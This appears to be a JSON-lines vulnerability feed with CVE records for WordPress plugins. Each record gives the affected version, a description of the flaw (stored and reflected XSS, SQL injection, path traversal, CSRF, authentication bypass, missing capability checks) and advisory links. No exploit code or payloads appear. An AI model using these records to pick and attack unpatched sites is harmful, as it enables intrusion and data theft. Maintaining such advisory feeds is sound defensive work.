{"CVE_ID":"CVE-2025-4419","slug":"hot-random-image","versionImpact":"1.9.2","description":"The Hot Random Image plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.9.2 via the 'path' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to access arbitrary images with allowed extensions, outside of the originally intended directory.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hot-random-image\\\/tags\\\/1.9.2\\\/hot_random_image.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hot-random-image\\\/tags\\\/1.9.2\\\/hot_random_image.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298033\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298033\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hot-random-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hot-random-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6628232-0bd1-4194-8322-36084b1eb0f7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6628232-0bd1-4194-8322-36084b1eb0f7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2732","slug":"mstore-api","versionImpact":"3.9.2","description":"The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2916124%40mstore-api&old=2915729%40mstore-api&sfp_email=&sfph_mail=#file58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2916124%40mstore-api&old=2915729%40mstore-api&sfp_email=&sfph_mail=#file58\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/listing-rest-api\\\/class.api.fields.php#L1079\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mstore-api\\\/tags\\\/3.9.0\\\/controllers\\\/listing-rest-api\\\/class.api.fields.php#L1079\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00761a7-fe24-49a3-b3e3-a471e05815c1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f00761a7-fe24-49a3-b3e3-a471e05815c1?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0710","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Cross-Site Scripting by using the 'fname' attribute of the 'mf_thankyou' shortcode to echo unescaped form submissions in versions up to, and including, 3.3.0. This allows authenticated attackers, with contributor-level permissions or above, to inject arbitrary web scripts in pages that will execute when the victim visits a page containing the shortcode when the submission id is present in the query string. Note that getting the JavaScript to execute requires user interaction as the victim must visit a crafted link with the form entry id, but the script itself is stored in the site database. Additionally this requires successful payment, increasing the complexity.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89a98053-33c7-4e75-87a1-0f483a990641?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/89a98053-33c7-4e75-87a1-0f483a990641?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1492","slug":"wpify-woo","versionImpact":"4.0.8","description":"The WPify Woo Czech plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the maybe_send_to_packeta function in all versions up to, and including, 4.0.8. This makes it possible for unauthenticated attackers to obtain shipping details for orders as long as the order number is known.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f691f2-b3f4-49b7-8710-015b5b11db18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44f691f2-b3f4-49b7-8710-015b5b11db18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037482%40wpify-woo%2Ftrunk&old=3028980%40wpify-woo%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037482%40wpify-woo%2Ftrunk&old=3028980%40wpify-woo%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4970","slug":"wp-widget-bundle","versionImpact":"2.0.0","description":"The Widget Bundle WordPress plugin through 2.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4a9fc352-7ec2-4992-9cda-7bdca4f42788\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4a9fc352-7ec2-4992-9cda-7bdca4f42788\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-43224","slug":"yamaps","versionImpact":"0.6.27","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Yuri Baranov YaMaps for WordPress allows Stored XSS.This issue affects YaMaps for WordPress: from n\/a through 0.6.27.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/yamaps\\\/wordpress-yamaps-for-wordpress-plugin-plugin-0-6-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/yamaps\\\/wordpress-yamaps-for-wordpress-plugin-plugin-0-6-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8369","slug":"eventprime-event-calendar-management","versionImpact":"4.0.4.3","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized access to Private or Password-protected events due to missing authorization checks in all versions up to, and including, 4.0.4.3. This makes it possible for unauthenticated attackers to view private or password-protected events.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/eventprime-event-calendar-management\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/eventprime-event-calendar-management\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11009","slug":"automatic-internal-links-for-seo","versionImpact":"1.2.1","description":"The Internal Linking for SEO traffic & Ranking \u2013 Auto internal links (100% automatic) plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018post_id\u2019 parameter in all versions up to, and including, 1.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197510\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3197510\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automatic-internal-links-for-seo\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/automatic-internal-links-for-seo\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35a690c5-dc7e-4bb7-be5b-c70bd0ea7d10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35a690c5-dc7e-4bb7-be5b-c70bd0ea7d10?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-56022","slug":"preloader-sws","versionImpact":"1.2.3","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WordPress Monsters Preloader by WordPress Monsters allows Reflected XSS.This issue affects Preloader by WordPress Monsters: from n\/a through 1.2.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/preloader-sws\\\/vulnerability\\\/wordpress-preloader-by-wordpress-monsters-plugin-1-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/preloader-sws\\\/vulnerability\\\/wordpress-preloader-by-wordpress-monsters-plugin-1-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-23637","slug":"wp-xintaoke","versionImpact":"1.1.2","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in NotFound ???WordPress?? allows Reflected XSS. This issue affects ???WordPress??: from n\/a through 1.1.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-xintaoke\\\/vulnerability\\\/wordpress-wordpress-plugin-1-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-xintaoke\\\/vulnerability\\\/wordpress-wordpress-plugin-1-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2484","slug":"multi-video-box","versionImpact":"1.5.2","description":"The Multi Video Box plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'video_id' and 'group_id' parameters in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-video-box\\\/tags\\\/1.5.2\\\/views\\\/group\\\/get_shortcode.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-video-box\\\/tags\\\/1.5.2\\\/views\\\/group\\\/get_shortcode.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-video-box\\\/tags\\\/1.5.2\\\/views\\\/video\\\/get_shortcode.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/multi-video-box\\\/tags\\\/1.5.2\\\/views\\\/video\\\/get_shortcode.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multi-video-box\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/multi-video-box\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/433e5ba3-c07e-48a1-a28b-781121d892ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/433e5ba3-c07e-48a1-a28b-781121d892ae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2083","slug":"awesome-logo-carousel-block","versionImpact":"2.1.6","description":"The Logo Carousel Gutenberg Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018sliderId\u2019 parameter in all versions up to, and including, 2.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-logo-carousel-block\\\/tags\\\/2.1.3\\\/inc\\\/classes\\\/style.php#L86\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-logo-carousel-block\\\/tags\\\/2.1.3\\\/inc\\\/classes\\\/style.php#L86\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271660\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3271660\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/awesome-logo-carousel-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/awesome-logo-carousel-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/604123f4-9247-489a-8fc8-478bfc697c7f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/604123f4-9247-489a-8fc8-478bfc697c7f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4405","slug":"hot-random-image","versionImpact":"1.9.2","description":"The Hot Random Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018link\u2019 parameter in all versions up to, and including, 1.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hot-random-image\\\/tags\\\/1.9.2\\\/hot_random_image.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hot-random-image\\\/tags\\\/1.9.2\\\/hot_random_image.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298033\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3298033\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hot-random-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hot-random-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5cff14e-e891-4569-afd8-2885ebb26401?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5cff14e-e891-4569-afd8-2885ebb26401?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6689","slug":"fl3r-accessibility-suite","versionImpact":"1.4","description":"The FL3R Accessibility Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's fl3raccessibilitysuite shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fl3r-accessibility-suite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fl3r-accessibility-suite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f673b5-2bcb-4591-b589-4d7230b5c2e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f673b5-2bcb-4591-b589-4d7230b5c2e7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5835","slug":"droip","versionImpact":"2.2.0","description":"The Droip plugin for WordPress is vulnerable to unauthorized modification and access of data due to a missing capability check on the droip_post_apis() function in all versions up to, and including, 2.2.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform many actions as the AJAX hooks to several functions. Some potential impacts include arbitrary post deletion, arbitrary post creation, post duplication, settings update, user manipulation, and much more.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/droip.com\\\/\",\"name\":\"https:\\\/\\\/droip.com\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2e6b451-9835-4887-ade7-b18807223a88?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2e6b451-9835-4887-ade7-b18807223a88?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0709","slug":"metform","versionImpact":"3.3.0","description":"The Metform Elementor Contact Form Builder for WordPress is vulnerable to Cross-Site Scripting by using the 'mf_last_name' shortcode to echo unescaped form submissions in versions up to, and including, 3.3.0. This allows authenticated attackers, with contributor-level permissions or above, to inject arbitrary web scripts in pages that will execute when the victim visits a page containing the shortcode when the submission id is present in the query string. Note that getting the JavaScript to execute requires user interaction as the victim must visit a crafted link with the form entry id, but the script itself is stored in the site database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2907471\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metform\\\/trunk\\\/base\\\/shortcode.php?rev=2845078\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25200656-a6a2-42f2-a607-26d4ff502cbf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25200656-a6a2-42f2-a607-26d4ff502cbf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5661","slug":"add-facebook","versionImpact":"1.5.4.6","description":"The Social Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'socialfeed' shortcode in all versions up to, and including, 1.5.4.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with author-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b145772-624e-4af0-9156-03c483bf8381?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8b145772-624e-4af0-9156-03c483bf8381?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-facebook\\\/tags\\\/1.5.4.6\\\/public\\\/templates\\\/default\\\/template.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-facebook\\\/tags\\\/1.5.4.6\\\/public\\\/templates\\\/default\\\/template.php#L417\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1475","slug":"coming-soon-maintenance-mode","versionImpact":"1.0.5","description":"The Coming Soon Maintenance Mode plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.5 via the REST API. This makes it possible for unauthenticated attackers to obtain post and page content thus bypassing the protection provided by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e4a1a3-71d0-4cad-9807-f6bbc99ccb13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44e4a1a3-71d0-4cad-9807-f6bbc99ccb13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037910%40coming-soon-maintenance-mode%2Ftrunk&old=3031487%40coming-soon-maintenance-mode%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3037910%40coming-soon-maintenance-mode%2Ftrunk&old=3031487%40coming-soon-maintenance-mode%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0828","slug":"play-ht","versionImpact":"3.6.4","description":"The Play.ht \u2013 Make Your Blog Posts Accessible With Text to Speech Audio plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 3.6.4. This makes it possible for authenticated attackers, with subscriber access or higher, to delete, retrieve, or modify post metadata, retrieve posts contents of protected posts, modify conversion data and delete article audio.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5708a414-7cd8-4926-8871-3248ebf4c39d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/play-ht\\\/trunk\\\/includes\\\/class-ajax-handler.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4969","slug":"wp-widget-bundle","versionImpact":"2.0.0","description":"The Widget Bundle WordPress plugin through 2.0.0 does not have CSRF checks when logging Widgets, which could allow attackers to make logged in admin enable\/disable widgets via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a7ec5dc-eda4-4fed-9df9-f41d2b937fed\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1a7ec5dc-eda4-4fed-9df9-f41d2b937fed\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9172","slug":"demo-importer-plus","versionImpact":"2.0.1","description":"The Demo Importer Plus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/476c4eb3-db28-4f6a-9502-969e7f1c5ec1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/476c4eb3-db28-4f6a-9502-969e7f1c5ec1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-importer-plus\\\/trunk\\\/inc\\\/importers\\\/wxr-importer\\\/class-demo-importer-plus-wxr-importer.php#L331\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/demo-importer-plus\\\/trunk\\\/inc\\\/importers\\\/wxr-importer\\\/class-demo-importer-plus-wxr-importer.php#L331\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/demo-importer-plus\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/demo-importer-plus\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160715\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3160715\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49627","slug":"wp-image-seo","versionImpact":"1.1.4","description":"Cross-Site Request Forgery (CSRF) vulnerability in Noor Alam WordPress Image SEO allows Cross Site Request Forgery.This issue affects WordPress Image SEO: from n\/a through 1.1.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-image-seo\\\/wordpress-wordpress-image-seo-plugin-1-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-image-seo\\\/wordpress-wordpress-image-seo-plugin-1-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10521","slug":"contact-forms","versionImpact":"1.9.2","description":"The WordPress Contact Forms by Cimatti plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.2. This is due to missing or incorrect nonce validation on the process_bulk_action function. This makes it possible for unauthenticated attackers to delete forms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms-list-page.php#L154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms-list-page.php#L154\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms-submissions-page.php#L348\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contact-forms\\\/trunk\\\/accua-forms-submissions-page.php#L348\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196728\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3196728\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-forms\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contact-forms\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f86e8ccb-a865-4da5-9250-dd715b8cdbe7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f86e8ccb-a865-4da5-9250-dd715b8cdbe7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
